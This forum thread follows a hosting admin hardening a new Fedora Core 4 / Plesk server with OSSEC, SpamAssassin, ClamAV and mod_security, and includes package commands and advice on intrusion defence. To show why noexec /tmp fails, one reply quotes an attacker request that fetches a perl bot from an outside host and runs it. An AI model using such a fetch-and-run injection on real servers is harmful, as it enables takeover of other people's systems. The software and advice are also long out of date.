Overview of securing a new server??

[bendalf]

Hi,

I've been running a dedicated server for the last year but will finally upgrade to a more powerfull server later this month.
This will allow me to start from scratch and therefore I would like to know a few things before I start with it.

I've already made a small list of actions I need to take to achieve what I want but I'm wondering if such an "overview" already exists. (there are seperate posts about this but as far as I know there is no complete guide available). Step-by-step instructions are always welcome of course.

This is what I want to achieve/do starting of a Fedora 4 install with Plesk 8.0

1. Backups
Implement a good backup solution using rsnapshot/rsync. Backups will be done to a remote rsync server.
Normally I will take a snapshot every 4 hours of the entire system.
2. Secure & harden the server
I'm planning to install Ossec for this. I also will not be using the plesk firewall.
3. Mail & Smap
Install Spamassassin and ClamAv
4. Monitoring
I've been using Cacti for over a year now so I will just install this again. I also tried Zabbix but this was overkill for me.
5. Logging & reporting
Since I hate grepping/finding/etc all the log-files, I installed Splunk. Simply the best tool for searching and reporting events from the logs.

Questions:

*Since I want to minimize the packages which are installed, which packages can I remove (DrWeb, psa-firewall) and how?
*For added security, which other packages should I install on top of Ossec? Which firewall should I install?
*For mail, should I install other things besides the ones I mentioned above?
*I've read some things about the packages of AtomicTurtle. I'm used to compiling everything myself so what is the added value of his repository (easy to use, etc) ?
*For the backup, which folders should I backup in order to restore a complete system from scratch?

Thanks.

ps. Using the info gathered here I will try to create 1 complete overview for other people.
pps. If this is not the correct forum, my apologies.

 

[atomicturtle]

A similar thread here in the ART forums:

http://atomicrocketturtle.com/forum/viewtopic.php?t=1640

OSSEC is a fantastic app, Ive been making changes to it left and right to tune it for hosting environments in ASL.

 

[bendalf]

Originally posted by atomicturtle
A similar thread here in the ART forums:

http://atomicrocketturtle.com/forum/viewtopic.php?t=1640

OSSEC is a fantastic app, Ive been making changes to it left and right to tune it for hosting environments in ASL.

Thanks, I've seen that thread but it's not exactly what I'm looking for ASL seems to be a great and nice tool but not for me. I like to work with seperate packages in order to learn from it and to control it exactly like I want.

I'm more looking in what to remove from the initial installation, what new things to install and also important in which order.

 

[atomicturtle]

The short version here, theres more than one way to do it.

ASL is a similar design to PSA, its reconfiguring the packages underneath, like mod_security, ossec, the kernel, etc, based on your security model. Granted I'm bundling those rpms as well, but theres nothing to stop you from taking them apart to tinker (source code is available).

I dont spend a lot of time down in the weeds on the specific packages installed on the system as a security control. In years gone by that was the security model used when there werent any better alternatives. SELinux, and GRSecurity being two of the bigger ones to change that security model with what is called Role Based Access Control (RBAC). With an RBAC system you could have gcc, perl modules, etc installed on the system, and block access to them even by the root user. In practice, its like password protecting applications.

It helps a lot if you have a good solid understanding of the threat first. With hosting your threat is about 90% web based applications, and 10% everything else. This is compounded further because you're most likely not in control of those applications, or if you are, in a position to change them if they're vulnerable to exploitation. This is assuming you even know what is there in the first place. The model used by the attacker is use those exploitable applications to upload their tools to further control the system. Methods used to block that have involved removing applications like wget, curl, etc, or mounting the tmp partitions noexec. The attackers respond by uploading their own versions of wget, running from apache writable directories, or an even more trivial model, using shell/perl/python/ruby/php scripts (this gets around noexec).

So your security model needs to address the following:
1) You cannot remediate your vulnerable applications (too many/unknown)
2) Removing tools is ineffective (attackers upload their own)
3) noexec settings do not stop these tools from being run (trivial to bypass)

Response:
1) Input validation, before traffic gets to those applications, with mod_security, and suhosin. When this fails

2) Use kernel level security controls to control the context in which applications can execute. IE, Trusted Path Execution in GRsecurity is a great example of a simple security model. Untrusted users can only execute commands owned by root. This is further enhanced by user-id level firewall rules, untrusted users can only use these ports, or contact these addresses. When this fails

3) Host based IDS to track file integrity checks, and automatically respond to host based security events. If we get to this security control, we're basically at the point where we're using this in a forensic/recovery capacity. The system has already been compromised.

Im hardly scratching the surface with item #2 there. The security controls in SELinux and Grsecurity are far more granular than I could articulate in brief. SELinux data-labeling being a prime example. If the app isnt labeled correctly, it wont run by anything (not php, sh, perl, etc) by any user, including root. You cant even move an application labeled at one security level down to a lower one, or even cut and paste between them. Its quite a powerful tool for securing hosting environments, closing off nearly every method an attacker could use to load exploit code to a system. I'm aiming for this to be the heart of the ASL 3.0 release.

 

[breun]

Originally posted by bendalf

This is what I want to achieve/do starting of a Fedora 4 install with Plesk 8.0

Why are you starting with a distribution that doesn't receive any security updates? And why not the latest version of Plesk? FC5 will be EOL next week, so at least go with FC6. If you're not into upgrading your OS every year, you might want to take a look at CentOS/RHEL instead (very similar, though much longer lifecycle).

Since I want to minimize the packages which are installed, which packages can I remove (DrWeb, psa-firewall) and how?

You could just not install them when you're installing Plesk or remove them afterwards using yum (or rpm directly).

 

[bendalf]

thanks for the replies.

I've done some more checking and finally decided to to the below actions. I do have a question about the atomic YUM repository.

I've seen that most tools I want are included in it but are there any differences between using that yum repo or installing from source ?

 

[atomicturtle]

It depends on the package, in general they're all modified in some way or another. Changes can be things like pre or post installation/upgrade actions, triggers to perform actions when other packages are installed/updated/removed, build time optimizations, and modifications to the original source code.

Then there is all the dependency/conflict information. For example, if I know a particular configuration setting is only going to work with a specific version of a library (this is a HUUUUUGE problem), I build that check into the package.

 

[bendalf]

Thanks atomicturtle, I decided to use your rpms and everything installed correctly yesterday.

The only rpm that I did not find was razor.

yum install dcc razor pyzor
Setting up Install Process
Setting up repositories
Reading repository metadata in from local files
Parsing package install arguments
No Match for argument: razor

Both dcc and pyzor installed without any problem.

 

[breun]

The package is called razor-agents (a 'yum search ...' might have helped you).

 

[bendalf]

For those who want to know, here is the complete list of action I've done yesterday. Note that I started from a FC4 and Plesk 8 install.

1* Plesk
Remove unused Plesk modules through the plesk GUI
Update Plesk to latest version using the plesk GUI (only select those components which are installed)

2* Remove unused application vault packages and DrWeb

yum remove AdvancedPoll AutoIndex CSLH DocFAQ Owl PostNuke TUTOS Tellme UebiMiau WebCalendar WebShopmanager
WordPress b2evolution bbclone gallery gtchat openbiblio pLog phpAds phpBB phpBook phpBugTracker phpDig phpMoney
phpMyFamily phpWiki phpsurveyor typo wordpress

yum remove drweb-base drweb-daemon drweb-qmail drweb-updater

3* Configure YUM to use the Atomic repository

wget -q -O - http://www.atomicorp.com/installers/atomic.sh | sh

4* Perform system update. This mainly updated MySQL and PHP

yum update

5* Install Spamassassin

Edit the file /etc/yum.conf to remove the exclude option. In my installation this was defined as "exclude=spamassassin". Otherwise, yum will not find any spamassassin installations.

yum install spamassassin

6* Install DCC and Pyzor. To check: Razor was not found

yum install dcc razor pyzor

7* Install ClamAV anti-virus

yum install qmail-scanner clamav-db clamav clamd

When done, also run the qmail scanner config

qmail-scanner-reconfigure

8* Reboot the machine and check if all services are started. I my case, spamassassin was not configured to start at boot. This can be solved by using

chkconfig --level 345 spamassassin on

9* Install OSSEC Host Intrusion Detection. This will start an installation script which let you define what ossec should handle

wget http://www.ossec.net/files/ossec-hids-1.2.tar.gz
tar -zxvf ossec-hids-*.tar.gz
cd ossec-hids-*
./install.sh

Voilà, I rebooted the server and everything still seems to work. I also tested Ossec and it generated some very nice alerts.
Still do to are configuring everything, installing cacti monitoring and splunk to check all my logs.

 

[breun]

I'm still wondering why you went with FC4 when you say you want a secure server. FC4 has been EOL for a while now.

And the package is called razor-agents, not razor.

 

[bendalf]

Originally posted by breun
I'm still wondering why you went with FC4 when you say you want a secure server. FC4 has been EOL for a while now.

And the package is called razor-agents, not razor.

thanks.. about FC4: it's not because this is EOL that you cannot secure it. The issue is that FC4 comes preloaded on that server. (is there an easy way to upgrade to a more recent version?) but I'm indeed thinking of going over to debian.

 

[breun]

You might want to check out the Atomic Offline OS Installer, a script at Atomic Rocket Turtle that will do a clean install of CentOS 4 on a machine running another OS.

Although Debian is a fine distribution I have the feeling that rpm-based distro's like CentOS(/Fedora/RHEL) have less problems running Plesk. Plus Atomic Rocket Turtle does support CentOS, but not Debian.

 

[atomicturtle]

Plus debian is for heathens. Notes on razor taken, I'll update that package soon to also work with the name "razor".

Something to add to your list, I packaged up the OSSEC web interface in the atomic channel, its called "ossec-wui".

 

[bendalf]

Ok, I finally have more time now so I can get on with the server.
Ossec is working fine including the active response.

I do have some questions about Spamassassin and ClamAV though.
Until now, I just installed them and have not yet taken a look at the configuration. Are there any actions I have to take like updating rules and AV settings ? I've read something about that rulesdujour, should I use that (if so where can I find extra info)?

Also, still on my list are installing mod_security and securing the /tmp folder. Any info about that is very welcome.

thanks

 

[atomicturtle]

In SA 3.0 they added an internal updater, sa-update. It has support for other channels of signatures, similar to the way yum works. Clamav also has an internal updater, called freshclam. In my packages Ive got these set up to run through cron. Also check out adding dcc, razor, and pyzor to SA. You dont have to do anything special to the SA config, just install them and restart.

Setting /tmp noexec doesnt really do anything these days. The badguys just upload a perl script, and run perl /tmp/scriptname. Heres an example:
http://teste21.t35.com/cmd/tool25.d...freewebs.com/seucu/gvabot.txt;perl gvabot.txt

Right now mod_security has some pretty severe performance limitations, so you can't load all our rules from gotroot.com on versions above 1.9.x . What you'll need to do on the newer versions is try to customize the core rules for your environment, which isn't a terribly pretty task. That being said, the 2.x series lets you do some much more useful inspection on the traffic (down to the session level, which is awesome), as well as anomaly detection.

 

[bendalf]

Thanks for the anwser Atomicturtle

For dcc, razor and pyzor, I just installed them using your rpms and restarted SA. Am I correct that these plugins do not need updates of rules ?

In my logs I now see these lines:
Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.0.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.0.so: undefined symbol: empty_string

I guess this is because I updated to php 5.2 and mysql 5.0. I remember seeing something like below:

warning: /etc/php.ini created as /etc/php.ini.rpmnew
warning: /etc/my.cnf created as /etc/my.cnf.rpmnew

Can I just replace the current php.ini & my.cnf with the new ones or are there extra steps to take ?

thanks

PS: I'm not a member of the Ossec team but I can really recommend it to anyone who wants to secure their servers. For me, this really is a must-have tool as I'm still amazed at all the alerts and actions it takes

PPS: About that ioncube error: I uninstalled the sitebuilder modules from plesk. I think that because of this, also the icocube tool was removed. Can someone confirm that (so basically I can just remove that module from php.ini)?

 

[bendalf]

Did a further check yesterday and replaced the my.cnf and php.ini with the new ones (after checking the options of course).

for that ioncube thing, I just uninstalled it using yum (both ioncube loader and the sitebuilder package).

Everything is working excellent now.

 

[atomicturtle]

Side note there, I did put together a new php-ioncube-loader rpm as well. It automatically will reconfigure itself to use the right extension with the version of php you're running.